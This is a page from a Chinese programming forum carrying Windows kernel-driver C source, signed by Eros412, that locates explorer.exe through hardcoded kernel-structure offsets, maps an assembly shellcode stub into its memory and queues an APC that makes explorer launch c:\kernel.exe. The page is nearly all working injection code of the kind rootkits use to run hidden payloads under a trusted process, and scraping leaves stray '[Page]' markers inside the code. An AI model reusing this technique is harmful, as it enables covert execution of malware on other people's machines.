| |
逆向工程之内核下创建用户进程代码:
//By:Eros412
#include <ntddk.h>
#include <ntifs.h>
PKAPC_STATE ApcState;
ULONG peprocess;
ULONG explorer;
PMDL mdl;
typedef enum _KAPC_ENVIRONMENT {
OriginalApcEnvironment,
AttachedApcEnvironment,
CurrentApcEnvironment,
InsertApcEnvironment
} KAPC_ENVIRONMENT;
NTKERNELAPI
VOID
KeInitializeApc (
PKAPC Apc,
PETHREAD Thread,
KAPC_ENVIRONMENT Environment,
PKKERNEL_ROUTINE KernelRoutine,
PKRUNDOWN_ROUTINE RundownRoutine,
PKNORMAL_ROUTINE NormalRoutine,
KPROCESSOR_MODE ProcessorMode,
PVOID NormalContext
);
NTKERNELAPI
BOOLEAN
KeInsertQueueApc (
PKAPC Apc,
PVOID SystemArgument1,
PVOID SystemArgument2,
KPRIORITY Increment
);
NTKERNELAPI
VOID
ExFreePoolWithTag(
IN PVOID P,
IN ULONG Tag
);
__declspec(naked) void call_me()
{
_asm{
mov eax,0x7C86136D
push 1
nop
push 0ABCDh
call eax [Page]
jmp here
_emit 0x63 //路径:c:\\kernel.exe
_emit 0x3A
_emit 0x5C
_emit 0x6B
_emit 0x65
_emit 0x72
_emit 0x6E
_emit 0x65
_emit 0x6C
_emit 0x2E
_emit 0x65
_emit 0x78
_emit 0x65
_emit 0x00
_emit 0x00
here:
nop
retn 0x0C
}
}
VOID OnUnload(
IN PDRIVER_OBJECT pDriverObject
)
{
if(pDriverObject->DeviceObject!=NULL)
IoDeleteDevice(pDriverObject->DeviceObject);
}
VOID myroutine(
IN PKAPC Apc,
IN OUT PKNORMAL_ROUTINE *NormalRoutine,
IN OUT PVOID *NormalContext,
IN OUT PVOID *SystemArgument1,
IN OUT PVOID *SystemArgument2
)
{
ExFreePoolWithTag(Apc,0);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
NTSTATUS DriverEntry( [Page]
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath
)
{
unsigned char alertable;
int activethread;
ULONG kthread;
PLIST_ENTRY cur;
PLIST_ENTRY next;
PLIST_ENTRY tcur;
PLIST_ENTRY tnext;
unsigned char * imagename;
UNICODE_STRING us;
PDEVICE_OBJECT _device;
PRKAPC apc;
PVOID mappedmemory;
ULONG jmpaddr_9;
ULONG jmpaddr_14;
RtlInitUnicodeString(&us,L\"\\\\Device\\\\KernelExec\");
IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device);
pDriverObject->DriverUnload=OnUnload;
peprocess=(ULONG)IoGetCurrentProcess();
cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088);
do{
imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255);
imagename=(unsigned char*)((ULONG)peprocess+0x174);
activethread=*(ULONG*)((ULONG)peprocess+0x1a0); [Page]
if(!_strnicmp(imagename,\"explorer.exe\",12)){
DbgPrint(\"%s\\t%d threads\",imagename,activethread);
explorer=peprocess;
tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190);
do{
kthread=(ULONG)tnext-0x22C;
alertable=*(unsigned char*)(kthread+0x164);
if((int)alertable==TRUE){
DbgPrint(\"KernelExec -> Found alertable thread\");
break;
}
tnext=tnext->Flink;
}while(tnext!=tcur);
break;
}
next=next->Flink;
peprocess=(ULONG)next-0x088;
[Page]
}while(next!=cur);
DbgPrint(\"KernelExec -> Targeted thread: 0x%p\",kthread);
apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444);
if(apc==NULL)
DbgPrint(\"KernelExec -> Failed to allocate memory\");
mdl=IoAllocateMdl(call_me,100,0,0,0);
if(mdl==0){
DbgPrint(\"KernelExec -> Failed to allocate MDL\");
ExFreePoolWithTag(apc,0);
goto end1;
}
MmProbeAndLockPages(mdl,0,1);
ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE));
KeStackAttachProcess((PKPROCESS)explorer,ApcState);
mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10);
if(mappedmemory==NULL){
DbgPrint(\"KernelExec -> Cannot map address\");
KeUnstackDetachProcess(ApcState);
IoFreeMdl(mdl);
ExFreePoolWithTag(apc,0);
goto end1;
}
DbgPrint(\"KernelExec -> UserMode memory at address:0x%p\",mappedmemory);
jmpaddr_9 = (ULONG)mappedmemory+0x9;
jmpaddr_14 = (ULONG)mappedmemory+0x14-3; //relative jmp 2字节,所以减3 [Page]
_asm{
pushad
pushfd
mov ecx,jmpaddr_9
mov edx,jmpaddr_14
mov [ecx],edx
popfd
popad
}
KeUnstackDetachProcess (ApcState);
KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0);
if(!KeInsertQueueApc(apc,0,0,0))
DbgPrint(\"KernelExec -> Failed to insert APC\");
DbgPrint(\"KernelExec -> APC delivered\");
end1:
return STATUS_SUCCESS;
}
文档说明:
相关文档
返回首页 | 关于本站 | | 友情链接 | 广告服务 | 意见建议 | 访客留言 | 本站论坛
Copyright© 2001-2006 ProgramBBS.com All Rights Reserved 版权所有©编程论坛
Email: 吉ICP备05009985号
感谢长春订餐网友情支持
